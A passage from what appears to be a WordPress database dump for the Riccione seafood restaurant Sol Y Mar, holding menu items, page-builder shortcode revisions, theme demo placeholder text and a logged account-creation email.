08:47:22','',0,'https://www.ristorantesolymar.it/?p=3984',3,'nav_menu_item','',0),(3379,1,'2020-12-06 12:06:23','2020-12-06 11:06:23','','Orari','','publish','closed','closed','','orari','','','2021-01-22 09:47:22','2021-01-22 08:47:22','',0,'https://www.ristorantesolymar.it/?p=3379',2,'nav_menu_item','',0),(3380,1,'2020-12-06 12:09:59','2020-12-06 11:09:59','','Chi siamo','','publish','closed','closed','','chi-siamo','','','2021-01-22 09:47:22','2021-01-22 08:47:22','',0,'https://www.ristorantesolymar.it/?p=3380',1,'nav_menu_item','',0),(3986,0,'2021-01-22 11:00:39','2021-01-22 10:00:39','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi tjxkptpcknz,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>tjxkptpcknz</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','','private','closed','closed','','your-sol-y-mar-account-has-been-created-10','','','2021-01-22 11:00:39','2021-01-22 10:00:39','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-10/',0,'postman_sent_mail','',0),(3382,1,'2020-12-06 12:11:15','2020-12-06 11:11:15',' ','','','publish','closed','closed','','3382','','','2020-12-06 12:11:15','2020-12-06 11:11:15','',0,'https://www.ristorantesolymar.it/?p=3382',3,'nav_menu_item','',0),(3383,1,'2020-12-06 12:11:15','2020-12-06 11:11:15',' ','','','publish','closed','closed','','3383','','','2020-12-06 12:11:15','2020-12-06 11:11:15','',0,'https://www.ristorantesolymar.it/?p=3383',1,'nav_menu_item','',0),(3384,1,'2020-12-06 12:11:15','2020-12-06 11:11:15',' ','','','publish','closed','closed','','3384','','','2020-12-06 12:11:15','2020-12-06 11:11:15','',3061,'https://www.ristorantesolymar.it/?p=3384',2,'nav_menu_item','',0),(3385,1,'2020-12-06 12:18:10','2020-12-06 11:18:10','<p>[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"three\" space_between_items=\"normal\" number_of_items=\"9\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"kitchen\"][/vc_column][/vc_row][vc_row][vc_column][mkdf_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"\" space_between_items=\"huge\"][/vc_column][/vc_row]</p>\n','Gallery','','inherit','closed','closed','','2627-autosave-v1','','','2020-12-06 12:18:10','2020-12-06 11:18:10','',2627,'https://www.ristorantesolymar.it/2020/12/06/2627-autosave-v1/',0,'revision','',0),(3386,1,'2020-12-06 12:18:24','2020-12-06 11:18:24','<p>[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"three\" space_between_items=\"normal\" number_of_items=\"9\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"kitchen\"][/vc_column][/vc_row][vc_row][vc_column][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"yes\" image_behavior=\"lightbox\" number_of_columns=\"\" space_between_items=\"huge\" images=\"1202,1201,1200,1182,1181,1180,1179,1178,1177,1176,1174\"][/vc_column][/vc_row]</p>\r\n','Gallery','','inherit','closed','closed','','2627-revision-v1','','','2020-12-06 12:18:24','2020-12-06 11:18:24','',2627,'https://www.ristorantesolymar.it/2020/12/06/2627-revision-v1/',0,'revision','',0),(3387,1,'2020-12-06 18:17:25','2020-12-06 17:17:25','<p>[vc_row content_text_aligment=\"center\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"yes\" item_style=\"slider-overlay\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" enable_pagination=\"yes\" pagination_skin=\"dark\" pagination_position=\"below-slider\" enable_title_pag=\"yes\" enable_mousewheel_scroll=\"yes\" category=\"new\" number_of_items=\"5\"][/vc_column][/vc_row]</p>\r\n','Dish Showcase','','inherit','closed','closed','','3055-revision-v1','','','2020-12-06 18:17:25','2020-12-06 17:17:25','',3055,'https://www.ristorantesolymar.it/2020/12/06/3055-revision-v1/',0,'revision','',0),(3388,1,'2020-12-06 18:23:00','2020-12-06 17:23:00','','Secondi di pesce','','publish','closed','closed','','secondi-di-pesce','','','2020-12-06 18:29:09','2020-12-06 17:29:09','',0,'https://www.ristorantesolymar.it/?post_type=portfolio-item&#038;p=3388',0,'portfolio-item','',0),(3389,1,'2020-12-06 18:24:08','2020-12-06 17:24:08','','Location sulla spiaggia','','publish','closed','closed','','location-sulla-spiaggia','','','2020-12-06 18:28:58','2020-12-06 17:28:58','',0,'https://www.ristorantesolymar.it/?post_type=portfolio-item&#038;p=3389',0,'portfolio-item','',0),(3390,1,'2020-12-06 18:25:34','2020-12-06 17:25:34','','Secondi','','publish','closed','closed','','secondi','','','2020-12-06 18:28:45','2020-12-06 17:28:45','',0,'https://www.ristorantesolymar.it/?post_type=portfolio-item&#038;p=3390',0,'portfolio-item','',0),(3391,1,'2020-12-06 18:26:41','2020-12-06 17:26:41','<p>[vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"yes\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"inner\" navigation_skin=\"dark\" enable_pagination=\"no\" enable_mousewheel_scroll=\"yes\" category=\"pesce\"][/vc_column][/vc_row]</p>\r\n','Fullscreen Showcase','','inherit','closed','closed','','3060-revision-v1','','','2020-12-06 18:26:41','2020-12-06 17:26:41','',3060,'https://www.ristorantesolymar.it/2020/12/06/3060-revision-v1/',0,'revision','',0),(3392,1,'2020-12-06 18:31:08','2020-12-06 17:31:08','<p>[vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"yes\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"inner\" navigation_skin=\"dark\" enable_pagination=\"no\" enable_mousewheel_scroll=\"yes\" category=\"pesce\" tag=\"pesce\"][/vc_column][/vc_row]</p>\r\n','Fullscreen Showcase','','inherit','closed','closed','','3060-revision-v1','','','2020-12-06 18:31:08','2020-12-06 17:31:08','',3060,'https://www.ristorantesolymar.it/2020/12/06/3060-revision-v1/',0,'revision','',0),(3393,1,'2020-12-06 18:36:05','2020-12-06 17:36:05','<p>[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1202\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.</p>\r\n<p>Mauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.<br />\r\nCucina di Pesce, proposte vegetariane<br />\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]</p>\r\n<div dir=\"auto\">e proposte vegetariane</div>\r\n<p>[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday<br />\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday<br />\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]</p>\r\n<h3>Ristorante Sol Y Mar</h3>\r\n<p>[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio<br />\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`<br />\r\n{<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#f5f5f5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.icon``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``visibility``: ``off``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#616161``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``elementType``: ``labels.text.stroke``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#f5f5f5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``administrative.land_parcel``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#bdbdbd``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#eeeeee``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#757575``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi.park``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#e5e5e5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``poi.park``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#ffffff``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.arterial``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#757575``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.highway``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#dadada``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.highway``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#616161``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``road.local``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``transit.line``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#e5e5e5``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``transit.station``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#eeeeee``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``water``,<br />\r\n``elementType``: ``geometry``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#c9c9c9``<br />\r\n}<br />\r\n`}`<br />\r\n},<br />\r\n{<br />\r\n``featureType``: ``water``,<br />\r\n``elementType``: ``labels.text.fill``,<br />\r\n``stylers``: `{`<br />\r\n{<br />\r\n``color``: ``#9e9e9e``<br />\r\n}<br />\r\n`}`<br />\r\n}<br />\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" 